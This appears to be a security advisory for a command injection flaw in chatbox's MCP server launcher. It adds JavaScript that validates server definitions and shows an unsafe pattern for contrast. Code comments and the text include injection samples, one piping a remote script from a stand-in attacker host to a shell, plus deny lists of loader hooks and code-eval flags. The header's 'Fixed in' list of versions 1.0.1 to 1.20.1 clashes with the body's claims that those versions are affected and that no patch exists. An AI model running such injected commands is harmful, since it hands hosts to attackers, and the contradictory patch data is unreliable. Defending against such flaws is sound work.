Platform: nodejs
Component: chatboxai/chatbox
Fixed in: 1.0.1, 1.1.1, 1.2.1, 1.3.1, 1.4.1, 1.5.1, 1.6.1, 1.7.1, 1.8.1, 1.9.1, 1.10.1, 1.11.1, 1.12.1, 1.13.1, 1.14.1, 1.15.1, 1.16.1, 1.17.1, 1.18.1, 1.19.1, 1.20.1
CVE-2026-6130 is a command injection vulnerability affecting chatboxai chatbox versions 1.0.0 through 1.20.0. The flaw is in the StdioClientTransport function of the Model Context Protocol (MCP) server management component: manipulation of the args/env parameters used to launch an MCP server lets an attacker execute arbitrary operating system commands on the host running chatbox, potentially leading to complete compromise of that host. A public exploit is available, increasing the risk of immediate exploitation.
Successful exploitation of CVE-2026-6130 gives an attacker arbitrary command execution on the host running chatboxai chatbox. This can lead to data exfiltration, takeover of the host and, where the host can reach other systems, lateral movement within the network. The vulnerability is rated as remotely exploitable, so the attacker does not need prior local access. With a public exploit available, the blast radius is significant for any unpatched instance, and largest for instances exposed to the public internet or embedded in a larger, interconnected environment.
A public exploit for CVE-2026-6130 is available, which raises the likelihood of exploitation. The vulnerability was reported to the project but had not received a response at the time of writing, which may indicate a lack of active maintenance. The vulnerability is tracked by the NVD and CISA. Given the ease of exploitation and the absence of a vendor response, organizations should prioritize mitigation.
Exploit status: public exploit available
EPSS: 1.76% (83rd percentile)
The primary mitigation for CVE-2026-6130 is to upgrade to a patched version of chatboxai chatbox. As of this writing, no patch has been released by the vendor. Until one is available, apply temporary controls: validate the command, args and env values that reach StdioClientTransport (allowlist the launcher binary, pass arguments as an array to a process API with the shell disabled rather than concatenating them into a command string, and restrict environment variables to an allowlist so that loader hooks such as NODE_OPTIONS or LD_PRELOAD cannot be injected); where the instance is exposed over HTTP, deploy a Web Application Firewall (WAF) with rules that detect and block command injection attempts; and monitor system logs for unexpected child processes spawned by the chatbox process. After implementing mitigations, verify them by attempting to reproduce the vulnerability with a safe, controlled payload.
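The following is an added example and not code from the chatbox project. It shows one way to implement the interim control described above: an untrusted MCP stdio server definition of the form { command, args, env } (the same fields an MCP SDK StdioClientTransport is constructed with) is validated against allowlists and then launched as an argv array with the shell disabled, next to the string-concatenation pattern that makes such a definition injectable. The allowlists, the code-eval flag list, the function names and the sample configurations are assumptions chosen for illustration, not chatbox's actual configuration format or code.

```javascript
// Added example (not code from the chatbox project): validate an untrusted MCP
// stdio server definition { command, args, env } before it reaches a process
// launch.  The allowlists, the flag list and the function names are
// assumptions chosen for illustration.

// Launchers an operator is willing to run MCP servers through.  Bare names
// only, so the command is resolved via a fixed PATH; shells, interpreters not
// listed here and absolute or relative paths are all rejected.
const ALLOWED_COMMANDS = new Set(['npx', 'node', 'uvx', 'python3']);

// Environment keys a server definition may set.  PATH is excluded because a
// config-controlled PATH would let an allowlisted name resolve to an
// attacker-supplied binary; loader hooks such as NODE_OPTIONS, LD_PRELOAD and
// PYTHONPATH are excluded because they run code before the server starts.
const ALLOWED_ENV_KEYS = new Set(['LANG', 'MCP_API_KEY', 'MCP_LOG_LEVEL']);

// Flags that turn an allowed launcher into an arbitrary-code runner
// (node -e/-p, python3 -c, legacy npx -c/--call).  Matched exactly or as FLAG=value.
const CODE_EVAL_FLAGS = ['-e', '--eval', '-p', '--print', '-c', '--call'];

const CONTROL_CHARS = /[\x00-\x1f\x7f]/;
const ENV_KEY = /^[A-Z_][A-Z0-9_]*$/;
const MAX_ARG_LENGTH = 4096;

function isEvalFlag(arg) {
  return CODE_EVAL_FLAGS.some((flag) => arg === flag || arg.startsWith(`${flag}=`));
}

function isPlainObject(value) {
  return typeof value === 'object' && value !== null && !Array.isArray(value);
}

// Returns { ok: true, spec } with a spawn-ready spec, or { ok: false, reason }.
// No field is ever joined into a string or handed to a shell.
function validateServerConfig(cfg) {
  if (!isPlainObject(cfg) || typeof cfg.command !== 'string' || !ALLOWED_COMMANDS.has(cfg.command)) {
    return { ok: false, reason: 'command not in allowlist' };
  }
  const args = cfg.args === undefined ? [] : cfg.args;
  if (!Array.isArray(args)) return { ok: false, reason: 'args must be an array of strings' };
  for (const arg of args) {
    if (typeof arg !== 'string' || arg.length > MAX_ARG_LENGTH || CONTROL_CHARS.test(arg)) {
      return { ok: false, reason: 'argument is not a plain string' };
    }
    if (isEvalFlag(arg)) return { ok: false, reason: `code-eval flag rejected: ${arg}` };
  }
  const rawEnv = cfg.env === undefined ? {} : cfg.env;
  if (!isPlainObject(rawEnv)) return { ok: false, reason: 'env must be an object' };
  const env = {};
  for (const [key, value] of Object.entries(rawEnv)) {
    if (!ENV_KEY.test(key) || !ALLOWED_ENV_KEYS.has(key)) {
      return { ok: false, reason: `env key not in allowlist: ${key}` };
    }
    if (typeof value !== 'string' || CONTROL_CHARS.test(value)) {
      return { ok: false, reason: `env value for ${key} is not a plain string` };
    }
    env[key] = value;
  }
  return { ok: true, spec: { command: cfg.command, args: [...args], env } };
}

// Vulnerable pattern shown for contrast (an illustration of the bug class,
// not code from chatbox): flattening the config into one string destined for
// exec() lets an argument such as "; curl attacker | sh" become a second command.
function buildShellCommandUNSAFE(cfg) {
  return `${cfg.command} ${(cfg.args || []).join(' ')}`;
}

// Hardened launch: argv array, shell disabled, and an environment built from a
// fixed base plus the validated keys only (the parent's environment is not
// inherited wholesale).  spawnFn is injected so the call can be exercised
// without starting a process; in production pass require('node:child_process').spawn.
function launchServer(spec, spawnFn) {
  const env = { PATH: process.env.PATH || '/usr/local/bin:/usr/bin:/bin', ...spec.env };
  return spawnFn(spec.command, spec.args, { env, shell: false, stdio: 'pipe', windowsHide: true });
}
```

A safe verification payload such as an argument of `; touch /tmp/pwned` is useful here: validateServerConfig accepts it (it is a plain string), but launchServer hands it to spawn as a single argv element with the shell disabled, so it reaches the MCP server as literal text and no second command runs. The same payload passed through buildShellCommandUNSAFE becomes part of one shell string, which is the behaviour the advisory describes. The controls that actually block the attack are the command allowlist, the rejection of code-eval flags and the env allowlist, since with shell metacharacters neutralised those are the remaining ways a config can run arbitrary code.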
Update to a patched version of chatboxai chatbox as soon as one exists. Because the vendor has not responded to the report, check the project's official documentation and repository for advisories, and consider community forks that carry a fix. Review and harden the server configuration, in particular restricting who can add or edit MCP server definitions, to reduce exposure to command injection.
CVE-2026-6130 is a command injection vulnerability affecting chatboxai chatbox versions 1.0.0–1.20.0 that allows attackers to execute operating system commands remotely.
You are affected if you are running chatboxai chatbox versions 1.0.0 through 1.20.0 and have not applied a patch or implemented mitigating controls.
Upgrade to a patched version of chatboxai chatbox. Until a patch is available, implement input validation and WAF rules as temporary mitigations.
Yes. A public exploit is available, which raises the likelihood of exploitation.
Check the chatboxai chatbox project's website and GitHub repository for updates and advisories regarding CVE-2026-6130.